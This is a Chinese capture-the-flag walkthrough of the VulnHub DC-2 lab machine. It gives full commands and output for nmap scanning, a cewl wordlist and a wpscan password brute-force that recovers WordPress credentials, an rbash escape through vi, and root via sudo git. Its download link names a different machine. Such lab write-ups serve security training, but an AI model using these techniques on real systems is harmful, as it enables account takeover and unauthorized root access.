DC-2靶机练习
声明
笔记的只是方便各位师傅学习知识,以下网站只涉及学习内容,其他的都与本人无关,切莫逾越法律红线,否则后果自负。
✍🏻作者简介:致力于网络安全领域,目前作为一名学习者,很荣幸成为一名分享者,最终目标是成为一名开拓者,很有趣也十分有意义
🤵♂️ 个人主页: @One_Blanks
欢迎评论 💬点赞👍🏻 收藏 📂加关注+
- 关注公众号:泷羽Sec-Blanks
X
带你去体验最真实的渗透环境,文章里不会直接摆答案,会全面的带你去进行信息收集以及漏洞利用,会领着你一步一步踩下我踩过的坑,实战往往比这更绝望,练技术须实践。
目录
靶机下载地址:https://www.vulnhub.com/entry/so-simple-1,515/
一、主机发现+信息收集
(一)信息收集
arp-scan -l
(二)环境变量设置
export ip=192.168.1.134
(三)端口扫描
nmap --min-rate 10000 -p- $ip
PORT STATE SERVICE
80/tcp open http
7744/tcp open raqmon-pdu
(四)服务信息收集
nmap -sS -sV -O -p80,7744 $ip
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
MAC Address: 00:0C:29:D5:E0:82 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.14, Linux 3.8 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
(五)默认脚本扫描
nmap --script=vuln -p80,7744 $ip
PORT STATE SERVICE
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-wordpress-users:
| Username found: admin
| Username found: tom
| Username found: jerry
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
| http-enum:
| /wp-login.php: Possible admin folder
| /readme.html: Wordpress version: 2
| /wp-includes/images/rss.png: Wordpress version 2.2 found.
| /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
| /wp-includes/images/blank.gif: Wordpress version 2.6 found.
| /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
| /wp-login.php: Wordpress login page.
| /wp-admin/upgrade.php: Wordpress login page.
|_ /readme.html: Interesting, a readme.
7744/tcp open raqmon-pdu
MAC Address: 00:0C:29:D5:E0:82 (VMware)
二、开始渗透
(一)80端口Web应用
我们直接访问发现并不能解析域名
WIndows 修改 C:\Windows\System32\drivers\etc\hosts 文件
Linux 修改 /etc/hosts
然后我们就访问到了
Lorem ipsum dolor sit amet, consectetur adipiscing elit.Donec augue est, auctor at nisi et, tristique tincidunt nulla.Maecenas vitae suscipit lorem, sed consectetur arcu.Nunc accumsan urna arcu, quis tincidunt justo aliquam at.Sed ullamcorper dui quis neque luctus sollicitudin sit amet vel erat.Nam faucibus rutrum purus, id varius metus feugiat vitae.Integer in finibus felis.Cras a fringilla leo.Sed turpis turpis, lobortis sed felis vitae, pretium suscipit sapien.Morbi id ultrices eros, sed suscipit metus.Sed lobortis vitae massa a blandit.Aliquam vestibulum ligula sed dictum faucibus.Nunc dui nisl, auctor ac pellentesque ut, sollicitudin non orci.Morbi vel condimentum sapien.
Nullam convallis, massa id sagittis tincidunt, velit dolor malesuada sem, nec ullamcorper risus sem eu odio.Duis id bibendum neque.Praesent maximus nisi purus, vel interdum arcu cursus eget.Quisque non leo sollicitudin, egestas nunc a, aliquam nisl.Aliquam porttitor libero metus, a finibus turpis convallis sit amet.Donec non sapien orci.Sed elit nisl, fringilla in est ac, lobortis volutpat felis.Praesent eros purus, volutpat nec turpis quis, lacinia venenatis augue.
Sed at turpis accumsan, sagittis dolor nec, imperdiet quam.Suspendisse massa ex, aliquam a porta sed, volutpat et ipsum.Nullam viverra at mi ut finibus.Curabitur lacinia eu elit vel vehicula.Proin orci ante, dictum a urna sodales, ullamcorper convallis ante.Nulla sit amet metus quis orci viverra rhoncus.Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae;In scelerisque, urna vitae laoreet congue, sapien magna feugiat nisi, in lobortis dolor dolor quis erat.Aliquam tincidunt auctor velit vitae suscipit.Suspendisse potenti.Nulla dictum risus ac hendrerit euismod.Etiam et quam varius, rutrum orci sed, ultricies urna.Aenean vel mi vitae arcu ornare rhoncus non et mi.
Vivamus interdum nibh at ante dapibus, quis aliquam libero varius.Sed id viverra neque.Proin sit amet erat ex.Aenean dignissim dictum mauris eget sodales.Vestibulum nec dignissim neque, vitae accumsan ante.Pellentesque volutpat nibh a blandit placerat.Vivamus vitae sodales arcu, non iaculis quam.Vestibulum varius velit odio, non posuere felis faucibus eget.Aenean interdum sollicitudin bibendum.Interdum et malesuada fames ac ante ipsum primis in faucibus.Suspendisse sodales ex a ex fringilla, eu pulvinar odio porttitor.Integer leo mi, volutpat nec dui eu, gravida pharetra metus.
这里啥都翻译不出来
在这里提示我们用cewl进行信息收集
cewl dc-2 -w list.txt
cat list.txt
nec
amet
sit
vel
orci
quis
site
non
sed
vitae
luctus
sem
leo
Sed
ante
nisi
content
Donec
Aenean
turpis
wrap
tincidunt
dictum
finibus
volutpat
egestas
Vestibulum
justo
odio
eget
neque
erat
quam
vestibulum
sodales
interdum
ipsum
arcu
suscipit
dui
urna
nulla
tellus
nibh
faucibus
blandit
sapien
nisl
laoreet
Suspendisse
sagittis
fermentum
auctor
cursus
eros
dignissim
Pellentesque
lacus
metus
Our
tortor
enim
consectetur
mauris
Proin
malesuada
placerat
rhoncus
velit
commodo
convallis
maximus
posuere
iaculis
dolor
molestie
augue
purus
WordPress
Nullam
hendrerit
Curabitur
viverra
risus
porta
dapibus
diam
nunc
porttitor
imperdiet
lacinia
lobortis
felis
Integer
condimentum
gravida
aliquam
semper
ullamcorper
navigation
scelerisque
Mauris
entry
congue
ultrices
vulputate
header
branding
feugiat
varius
ligula
Feed
Nam
vehicula
ornare
libero
Praesent
bibendum
elit
ultricies
tristique
Maecenas
lorem
euismod
sollicitudin
lectus
Cras
pulvinar
Phasellus
magna
elementum
eleifend
tempus
Flag
rutrum
primis
Quisque
Aliquam
Morbi
fringilla
Etiam
est
Fusce
pharetra
accumsan
Products
People
What
venenatis
efficitur
another
facilisis
consequat
Just
Welcome
Nunc
massa
pellentesque
Duis
Nulla
cubilia
Curae
fames
Vivamus
Skip
text
custom
Menu
mattis
mollis
top
masthead
pretium
contain
page
potenti
Comments
RSD
colophon
powered
Proudly
info
primary
main
post
netus
habitant
morbi
senectus
aliquet
tempor
you
just
can
Interdum
maybe
log
need
cewl
More
passwords
always
better
but
sometimes
the
win
them
all
Log
one
see
find
flag
next
panel
adipiscing
Lorem
down
Scroll
facilisi
Orci
natoque
penatibus
magnis
dis
parturient
montes
nascetur
ridiculus
mus
Your
usual
wordlists
probably
won
work
instead
我们在上面脚本扫描中得知这个站是用的wordpress,我们直接用wpscan工具
wpscan --url dc-2 -P list.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.28
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://dc-2/ [192.168.1.134]
[+] Started: Sun Apr 6 06:45:06 2025
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.10 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://dc-2/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
| Found By: Rss Generator (Passive Detection)
| - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
| - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://dc-2/wp-content/themes/twentyseventeen/
| Last Updated: 2024-11-12T00:00:00.000Z
| Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 3.8
| Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Found By: Style (Passive Detection)
| - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <=========================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <==========================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] jerry
| Found By: Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] tom
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] Performing password attack on Xmlrpc against 3 user/s
[SUCCESS] - jerry / adipiscing
[SUCCESS] - tom / parturient
Trying admin / won Time: 00:00:31 <============================ > (684 / 1160) 58.96% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[SUCCESS] - jerry / adipiscing
[SUCCESS] - tom / parturient
成功扫到两个用户
因为开了ssh我们先去登ssh
ssh tom@192.168.1.134 -p 7744
注意需要用 -p 参数指定端口 7744 因为ssh服务的默认22端口已经被改成了7744
三、获得初始权限
我们尝试的 tom 用户成功拿到了shell初始权限
四、提权
随便输入了几个命令发现命令十分受限,我们先看一下可以执行什么命令,这个的话就是看环境变量了
echo $SHELL
/bin/rbash
echo $PATH
/home/tom/usr/bin
ls -liah /home/tom/usr/bin
tom@DC-2:~$ ls -liah /home/tom/usr/bin
total 8.0K
140350 drwxr-x--- 2 tom tom 4.0K Mar 21 2019 .
140344 drwxr-x--- 3 tom tom 4.0K Mar 21 2019 ..
140352 lrwxrwxrwx 1 tom tom 13 Mar 21 2019 less -> /usr/bin/less
132585 lrwxrwxrwx 1 tom tom 7 Mar 21 2019 ls -> /bin/ls
140356 lrwxrwxrwx 1 tom tom 12 Mar 21 2019 scp -> /usr/bin/scp
140354 lrwxrwxrwx 1 tom tom 11 Mar 21 2019 vi -> /usr/bin/vi
我们发现这里只能用
less ls scp vi 这几个命令
https://gtfobins.github.io/ 用此网站查看提取命令
这里用vi进行shell逃逸
vi
:set shell=/bin/sh
:shell
- 打开 Vim 后,是为了先输入
:set shell=/bin/sh来设置 shell,命令行模式下,:`是开启输入命令。 - 接着输入
:shell,此时会进入到 shell 环境,你可以执行如ls查看当前目录下的文件列表、cd切换目录等各种 shell 命令。
然后修改环境变量
export PATH=/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin:$PATH
输入之前被禁的命令find,发现可以执行成功逃逸
我们查看用户还是看到了jerry用户
ls /home
说明可以有办法登上jerry用户,只是ssh卡住,那就su切换试试
su jerry
密码 adipiscing
先看权限 sudo -l
Matching Defaults entries for jerry on DC-2:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jerry may run the following commands on DC-2:
(root) NOPASSWD: /usr/bin/git
我们发现 jerry可以以root 权限执行git命令,那我们就可以进行提取了
https://gtfobins.github.io/gtfobins/git/
用git进行提权
TF=$(mktemp -d)
ln -s /bin/sh "$TF/git-x"
sudo git "--exec-path=$TF" x
直接就是root了
五、提权成功
jerry@DC-2:/home/tom$ sudo -l
Matching Defaults entries for jerry on DC-2:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jerry may run the following commands on DC-2:
(root) NOPASSWD: /usr/bin/git
jerry@DC-2:/home/tom$ TF=$(mktemp -d)
jerry@DC-2:/home/tom$ ln -s /bin/sh "$TF/git-x"
jerry@DC-2:/home/tom$ sudo git "--exec-path=$TF" x
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
扫一扫
3231
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
